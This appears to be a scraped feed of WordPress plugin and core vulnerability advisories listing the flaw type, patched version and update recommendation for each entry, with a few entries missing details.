Plugin: W3 Total Cache

Vulnerability: Reflected Cross-Site Scripting via extension
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.7
Recommended Action: Update to version 3.7.7, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.9.31
Recommended Action: Update to version 2.9.31, or a newer patched version

Plugin: Drag and Drop Multiple File Upload for WooCommerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: iQ Block Country

Vulnerability: Country Blocking Bypass
Patched Version: 1.2.19
Recommended Action: Update to version 1.2.19, or a newer patched version

Plugin: AGP Font Awesome Collection

Plugin: WP MLM SOFTWARE PLUGIN

Plugin: WordPress File Upload

Vulnerability: Authenticated (Administrator+) Path Traversal
Patched Version: 4.19.2
Recommended Action: Update to version 4.19.2, or a newer patched version

Plugin: Woocommerce Email Report

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Remote Code Execution
Patched Version: 2.0.15
Recommended Action: Update to version 2.0.15, or a newer patched version

Plugin: mTouch Quiz

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Contact form Form For All – Easy to use, fast, 37 languages.

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GTmetrix for WordPress

Vulnerability: Reflected Cross-Site Scripting via ‘report_id’ and ‘event_id’
Patched Version: 0.4.7
Recommended Action: Update to version 0.4.7, or a newer patched version

Plugin: User Meta – User Profile Builder and User management plugin

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Mass Delete Unused Tags

Vulnerability: Cross-Site Request Forgery via plugin_mass_delete_unused_tags_init
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: List Pages Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Site Offline Or Coming Soon Or Maintenance Mode

Vulnerability: Maintenance Mode Bypass
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Falang multilanguage for WordPress

Vulnerability: Cross-Site Request Forgery via add_language
Patched Version: 1.3.40
Recommended Action: Update to version 1.3.40, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: EZP Maintenance Mode

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Share Buttons by Supsystic

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Mediavine Control Panel

Vulnerability: Cross-Site Request Forgery via render_settings_page
Patched Version: 2.10.3
Recommended Action: Update to version 2.10.3, or a newer patched version

Plugin: WordPress RokBox

Plugin: Simple Social Media Share Buttons – Social Sharing for Everyone

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Afterpay Gateway for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Encrypted Contact Form

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Discount Rules for WooCommerce – Create Smart WooCommerce Coupons & Discounts, Bulk Discount, BOGO Coupons

Vulnerability: Missing Authorization
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: WP PHP widget

Core: WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Quick Chat

Plugin: demon image annotation

Vulnerability: Improper Input Restriction Validation
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Simplelife

Plugin: Royal Elementor Addons and Templates

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Responsive Slider – Image Slider – Slideshow for WordPress

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: idbbee

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Upload Restriction

Vulnerability: Missing Authorization Checks
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: DSGVO All in one for WP

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: SpeedyCache – Cache, Optimization, Performance

Vulnerability: Missing Authorization via speedycache_create_test_cache
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Pods – Custom Content Types and Fields

Vulnerability: Authenticated Stored Cross-Site Scripting via Menu Label field
Patched Version: 2.7.27
Recommended Action: Update to version 2.7.27, or a newer patched version

Plugin: Email Tracker – Email Tracking Plugin to track Emails for Open and Email Links Click (Compatible with WooCommerce)

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.7
Recommended Action: Update to version 5.2.7, or a newer patched version

Plugin: Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Insufficient Restrictions during Export Personal Data requests
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.2
Recommended Action: Update to version 3.6.2, or a newer patched version

Plugin: VikRentCar Car Rental Management System

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery and Stored Cross-Site Scripting
Patched Version: 2.0.52
Recommended Action: Update to version 2.0.52, or a newer patched version

Plugin: JobCareer | Job Board Responsive WordPress Theme

Vulnerability: Unauthenticated Arbitrary Password Reset
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: WPML

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.14
Recommended Action: Update to version 4.5.14, or a newer patched version

Plugin: WooCommerce Brands

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.46
Recommended Action: Update to version 1.6.46, or a newer patched version

Plugin: User registration & user profile – UserPlus

Plugin: Search Everything

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.1.1
Recommended Action: Update to version 8.1.1, or a newer patched version

Plugin: WP Hardening (discontinued)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: illi Link Party!

Plugin: Contact Form Generator : Creative form builder for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: WHIZZ

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Ghost

Vulnerability: Missing Authorization Checks
Patched Version: 0.5.6
Recommended Action: Update to version 0.5.6, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: cformsII

Vulnerability: Unauthenticated HTML Injection & Cross-Site Request Forgery
Patched Version: 15.0.2
Recommended Action: Update to version 15.0.2, or a newer patched version

Plugin: Restaurant & Cafe Addon for Elementor

Vulnerability: Missing Authorization via multiple AJAX functions
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Backend Localization

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.9.2
Recommended Action: Update to version 8.9.2, or a newer patched version

Plugin: Redirect After Login

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Radio Forge Muses Player with Skins

Plugin: S3 Video Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 0.983
Recommended Action: Update to version 0.983, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Missing Authorization via templates
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Membership Plugin – Restrict Content

Vulnerability: Information Exposure via legacy log file
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: DoLogin Security

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Timetable and Event Schedule by MotoPress

Vulnerability: Author+ Stored Cross-Site Scripting
Patched Version: 2.3.19
Recommended Action: Update to version 2.3.19, or a newer patched version

Plugin: Avada (Fusion) Builder

Vulnerability: Unauthenticated Server-Side Request Forgery
Patched Version: 3.6.2
Recommended Action: Update to version 3.6.2, or a newer patched version

Plugin: WP Translitera

Plugin: Checkout Field Editor

Vulnerability: Cross-Site Request Forgery to Checkout Fields Update
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: download-zip-attachments

Plugin: AI Infographic Maker

Vulnerability: SQL Injection
Patched Version: 4.3.8
Recommended Action: Update to version 4.3.8, or a newer patched version

Plugin: DOOFINDER Search and Discovery for WP & WooCommerce

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Duplicate Page and Post

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: WP Customer Area

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.1.4
Recommended Action: Update to version 8.1.4, or a newer patched version

Plugin: Social Stickers

Plugin: JetEngine

Vulnerability: Authenticated (Contributor+) Privilege Escalation
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: M-vSlider

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.17.3
Recommended Action: Update to version 2.17.3, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.12
Recommended Action: Update to version 1.9.12, or a newer patched version

Plugin: Domain Replace

Plugin: Hotscot Contact Form

Vulnerability: SQL Injection
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Team Members Showcase

Plugin: Popup contact form

Plugin: Kaya QR Code Generator

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via url parameter
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Mediamatic – Media Library Folders

Plugin: Albo Pretorio On line

Vulnerability: Reflected Cross-Site Scripting via ‘Errore’
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Feeds For Twitter

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Core: WordPress

Vulnerability: Brute Force of Cross-Site Request Forgery Tokens
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: Pop-up

Vulnerability: Missing authorization to Settings Change
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: SVG Uploads Support

Plugin: Enable SVG

Vulnerability: Cross-Site Scripting via SVG
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Spiffy Calendar

Vulnerability: Event deletion via Cross-Site Request Forgery
Patched Version: 4.9.1
Recommended Action: Update to version 4.9.1, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated SQL Injection via tag_id Parameter
Patched Version: 1.3.51
Recommended Action: Update to version 1.3.51, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Authenticated Settings Change leading to Arbitrary File Upload
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Local File Inclusion
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: WP RSS Images

Plugin: WPFront Scroll Top

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: JSmol2WP

Plugin: Stock Sync for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via page parameter
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Wholesale Market

Vulnerability: Information Disclosure via Unauthenticated Arbitrary File Download
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Advanced Woo Search

Vulnerability: Information Disclosure
Patched Version: 2.00
Recommended Action: Update to version 2.00, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.21.0
Recommended Action: Update to version 2.21.0, or a newer patched version

Plugin: Mail Masta

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 22.4
Recommended Action: Update to version 22.4, or a newer patched version

Plugin: Admin Menu

Plugin: Redux Framework

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.24
Recommended Action: Update to version 4.1.24, or a newer patched version

Plugin: Pay Per Media Player

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting via Customizer
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: WebToffee WP Backup and Migration

Vulnerability: Missing Authorization to Settings and Schedule Modification
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Google Analytics 4 (GA4), Google Ads, Meta Pixel, GTM & Multiple Pixels for Woocommerce & WordPress

Vulnerability: Missing Authorization
Patched Version: 6.5.1
Recommended Action: Update to version 6.5.1, or a newer patched version

Plugin: Power BI Embedded for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: PrettyLinks – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting via track_link
Patched Version: 2.1.10
Recommended Action: Update to version 2.1.10, or a newer patched version

Plugin: Plg Novana

Plugin: Altos Connect

Plugin: Brizy – Page Builder

Vulnerability: IP Address Spoofing to Protection Mechanism Bypass
Patched Version: 2.4.19
Recommended Action: Update to version 2.4.19, or a newer patched version

Plugin: WP Booking System – Booking Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: WP Extra File Types

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 0.5.1
Recommended Action: Update to version 0.5.1, or a newer patched version

Plugin: Video Gallery – Vimeo and YouTube Gallery

Vulnerability: Vimeo and YouTube Gallery < 1.1.5
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Connections Business Directory

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 10.4.37
Recommended Action: Update to version 10.4.37, or a newer patched version

Plugin: Testimonials Widget

Vulnerability: Multiple Authenticated Stored Cross-Site Scripting
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Peter’s Collaboration E-mails

Plugin: WP Cost Estimation

Vulnerability: Missing Authorization to Arbitrary File Upload/Delete
Patched Version: 9.644
Recommended Action: Update to version 9.644, or a newer patched version

Plugin: WP Film Studio – WordPress Movie Maker/Production Plugin

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: indexisto

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization to Cache Deletion
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: PrettyLinks – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.14
Recommended Action: Update to version 1.14, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via mf_first_name shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Splashing Images

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: CPT – Speakers

Plugin: Smart Slider 3

Vulnerability: Authenticated (Contributor+) PHP Object Injection
Patched Version: 3.5.1.11
Recommended Action: Update to version 3.5.1.11, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via logo_width parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Master Slider – Responsive Touch Slider

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via Media URL
Patched Version: 11.0.12
Recommended Action: Update to version 11.0.12, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_save_sort_order
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Insights from Google PageSpeed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Core: WordPress

Vulnerability: .swf and .exe File Upload
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: Data Tables Generator by Supsystic

Vulnerability: Missing Authorization
Patched Version: 1.10.26
Recommended Action: Update to version 1.10.26, or a newer patched version

Plugin: Advanced Custom Fields: Extended

Vulnerability: Admin+ SQL Injection
Patched Version: 0.8.8.7
Recommended Action: Update to version 0.8.8.7, or a newer patched version

Plugin: Visitors

Plugin: Weblizar Pin Feeds

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Kali Forms <= 2.3.28
Patched Version: 2.3.29
Recommended Action: Update to version 2.3.29, or a newer patched version

Plugin: Social Like Box and Page by WpDevArt

Vulnerability: Authenticated (Admin+) Stored Cross Site Scripting
Patched Version: 0.8.40
Recommended Action: Update to version 0.8.40, or a newer patched version

Plugin: Watu Quiz

Vulnerability: 3.1.2.5
Patched Version: 3.1.2.6
Recommended Action: Update to version 3.1.2.6, or a newer patched version

Plugin: WP Editor

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: WP Hide & Security Enhancer

Vulnerability: Arbitrary File Download
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Beautiful Cookie Consent Banner

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.10.1
Recommended Action: Update to version 2.10.1, or a newer patched version

Plugin: WP User Merger

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Mantenimiento web

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.14
Recommended Action: Update to version 0.14, or a newer patched version

Plugin: LeadSnap

Vulnerability: Unauthenticated PHP Object Injection via AJAX
Patched Version: 1.24
Recommended Action: Update to version 1.24, or a newer patched version

Plugin: Stripe Payments For WooCommerce by Checkout Plugins

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.11
Recommended Action: Update to version 1.4.11, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 4.9.3.4
Recommended Action: Update to version 4.9.3.4, or a newer patched version

Plugin: Travel Management

Vulnerability: Open Redirect
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Oleggo LiveStream

Plugin: GetYourGuide Ticketing

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Indeed Membership Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.6.2
Recommended Action: Update to version 8.6.2, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Authentication Bypass
Patched Version: 5.4.4
Recommended Action: Update to version 5.4.4, or a newer patched version

Plugin: WP OER

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.1
Recommended Action: Update to version 0.9.1, or a newer patched version

Core: WordPress

Vulnerability: Spoof Post Authorship
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: WPGraphQL

Vulnerability: Information Exposure
Patched Version: 0.3.5
Recommended Action: Update to version 0.3.5, or a newer patched version

Plugin: Essential Blocks Pro

Vulnerability: Unauthenticated PHP Object Injection via queries
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: WordPress Button Plugin MaxButtons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 9.6
Recommended Action: Update to version 9.6, or a newer patched version

Plugin: Matterport Shortcode

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: Cross-Site Request Forgery leading to Uninstall Form Submission
Patched Version: 3.7.8
Recommended Action: Update to version 3.7.8, or a newer patched version

Plugin: WP Super Minify

Vulnerability: Cross-Site Request Forgery via ‘wpsmy_admin_options’
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Unauthenticated PHP Object injection
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: Podlove Subscribe button

Vulnerability: Cross-Site Request Forgery via process_form function
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: BAN Users

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Settings Update & Privilege Escalation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Sign Up

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Cross-Site Request Forgery to Disable All Plugins
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Zero Spam for WordPress

Vulnerability: SQL Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Core: WordPress

Vulnerability: 6.3.1
Patched Version: 6.3.2
Recommended Action: Update to version 6.3.2, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Administrator+) Arbitrary File Deletion
Patched Version: 0.9.77
Recommended Action: Update to version 0.9.77, or a newer patched version

Plugin: Social Media Widget by Acurax

Vulnerability: Cross-Site Request Forgery leading to Cross-Site Scripting via the recordsArray Parameter
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Button Generator – easily Button Builder

Vulnerability: Cross-Site Request Forgery in tools-data-base.php
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: Tweet Blender

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: WP-EMail

Vulnerability: SQL Injection
Patched Version: 2.67.2
Recommended Action: Update to version 2.67.2, or a newer patched version

Plugin: CMP – Coming Soon & Maintenance Plugin by NiteoThemes

Vulnerability: Maintenance Mode Bypass
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: Image Slider by Ays- Responsive Slider and Carousel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Random Banner

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via ‘caption’
Patched Version: 2.5.5.3
Recommended Action: Update to version 2.5.5.3, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: wpDiscuz <= 7.3.0
Patched Version: 7.3.2
Recommended Action: Update to version 7.3.2, or a newer patched version

Plugin: Login by Auth0

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: User Private Files – File Upload & Download Manager with Secure File Sharing

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: Rimons Twitter Widget

Vulnerability: Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: qTranslate X

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Improper Authorization on REST Routes via ‘save_settings_permission’
Patched Version: 4.0.26
Recommended Action: Update to version 4.0.26, or a newer patched version

Plugin: Custom Sidebars – Dynamic Sidebar Widget Area Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.8.1
Recommended Action: Update to version 3.0.8.1, or a newer patched version

Plugin: Evarisk

Vulnerability: Arbitrary File Upload
Patched Version: 5.1.5.5
Recommended Action: Update to version 5.1.5.5, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Sensitive Information Disclosure leading to Remote Code Execution
Patched Version: 1.2.42
Recommended Action: Update to version 1.2.42, or a newer patched version

Plugin: Q2W3 Post Order

Plugin: PressForward

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: DOM-Based iFrame Injection
Patched Version: 3.5.5
Recommended Action: Update to version 3.5.5, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Improper Input Validation via openssl_verify
Patched Version: 0.9.7.4
Recommended Action: Update to version 0.9.7.4, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Scripting
